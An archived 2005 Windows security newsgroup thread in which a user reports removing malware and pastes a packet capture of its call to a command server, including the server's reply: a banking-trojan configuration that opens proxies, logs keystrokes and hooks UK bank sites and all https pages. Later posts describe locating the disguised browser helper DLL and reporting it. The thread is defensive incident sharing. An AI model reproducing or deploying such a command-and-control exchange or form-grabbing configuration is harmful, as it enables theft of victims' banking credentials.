Sign in with
Sign up | Sign in
Your question

My puter was "calling home" to 83.149.82.168

Last response: in Windows XP
Share
Anonymous
April 18, 2005 2:06:04 PM

Archived from groups: microsoft.public.windowsxp.security_admin (More info?)

I have manually removed a malware from my system.
It was opening a lot of ports.
And every time it opend a new port
it was "calling home" to 83.149.82.168

I can provide a full Ethereal dump
and the 3 "bad" files I found
if anybody is interested.

I have sent an email the isp's abuse.

This is what Ethereal extracted:

POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
Host: nugget-sales.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close

i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210&k=37103&m=37103&panic=0&c=United
Kingdom&l=ENG&mo=0
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 04:00:09 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Content-Length: 671
Connection: close
Content-Type: text/html; charset=ISO-8859-1

http +www.microsoft.com +Ba "Mozilla/4.0 (compatible\; MSIE 6.0\;
Windows NT 5.1)"
rmold
socks 0.0.0.0:65535
httpp +0.0.0.0:65535
log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer
-qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 1 *.lloydsts
b.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 2 *.nwolb.com* * * +urfKPMWS 4096 2 200000
setwnd 3 *.hsbc.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 4 *.barclays.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 17 https://* * * +urfKPBMW 4096 1000 2
setwnd 18 * https://* * +urfKPBMW 4096 1000 2
setwnd 19 * * * +urfKP*MW 4096 2
http #hosts +I 60000
April 18, 2005 7:59:06 PM

Archived from groups: microsoft.public.windowsxp.security_admin (More info?)

-rehn- wrote:

> I have manually removed a malware from my system.
> It was opening a lot of ports.
> And every time it opend a new port
> it was "calling home" to 83.149.82.168
>
> I can provide a full Ethereal dump
> and the 3 "bad" files I found
> if anybody is interested.
>
> I have sent an email the isp's abuse.
>
> This is what Ethereal extracted:

(snip headers)

And did you have a question about this? Your computer was compromised.
Take steps to clean it up. Did you need to know how to do this? Do you
now have a current version antivirus installed using updated
definitions as well as a firewall?

Malke
--
MS MVP - Windows Shell/User
www.elephantboycomputers.com
In Memoriam - MVP Alex Nichol
The world is diminished without him.
Anonymous
May 25, 2005 5:58:58 PM

Archived from groups: microsoft.public.windowsxp.security_admin (More info?)

-rehn- Wrote:
> I have manually removed a malware from my system.
> It was opening a lot of ports.
> And every time it opend a new port
> it was "calling home" to 83.149.82.168
>
> I can provide a full Ethereal dump
> and the 3 "bad" files I found
> if anybody is interested.
>
> I have sent an email the isp's abuse.
>
> This is what Ethereal extracted:
>
> POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
> Host: nugget-sales.com
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 108
> Accept: */*
> Accept-Language: en
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
> Connection: close
>
> i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210&k=37103&m=37103&panic=0&c=United
> Kingdom&l=ENG&mo=0
> HTTP/1.1 200 OK
> Date: Mon, 18 Apr 2005 04:00:09 GMT
> Server: Apache/2.0.40 (Red Hat Linux)
> Content-Length: 671
> Connection: close
> Content-Type: text/html; charset=ISO-8859-1
>
> http +'www.microsoft.com' (http://www.microsoft.com/) +Ba "Mozilla/4.0
> (compatible\; MSIE 6.0\;
> Windows NT 5.1)"
> rmold
> socks 0.0.0.0:65535
> httpp +0.0.0.0:65535
> log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer
> -qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
> setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 1 *.lloydsts
> b.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 2 *.nwolb.com* * * +urfKPMWS 4096 2 200000
> setwnd 3 *.hsbc.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 4 *.barclays.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 17 'https://*' (https://*/) * * +urfKPBMW 4096 1000 2
> setwnd 18 * 'https://*' (https://*/) * +urfKPBMW 4096 1000 2
> setwnd 19 * * * +urfKP*MW 4096 2
> http #hosts +I 60000


Hi, I found this baby on four PC's/servers in our network.
took the same aproach you did but found nothing.
Then I ran "hijackthis" and did a scan.
I located a strange BHO (Browser Helper Object" pointing to a dll in
\windows\system32. It had a different name on all machines but always
looked like a MS file . I did not have a version info tab in the
prperties though. It was about 71Kb and accompanied by a .dat file with
the same name.
I tried to deleted but it was in use so I used a tool wich can do that
at startup. When the file was gone so was the traffic to
nugget-sales.com. It was not detected by any antivirus or antispyware
engine so I reported it to virus@ca.com. They have now analyzed it and
confirmed it to be malware.
good luck,
Ruud


--
grom_home
------------------------------------------------------------------------
grom_home's Profile: http://www.iamnotageek.com/member.php?userid=13147
View this thread: http://www.iamnotageek.com/showthread.php?t=1819062359
!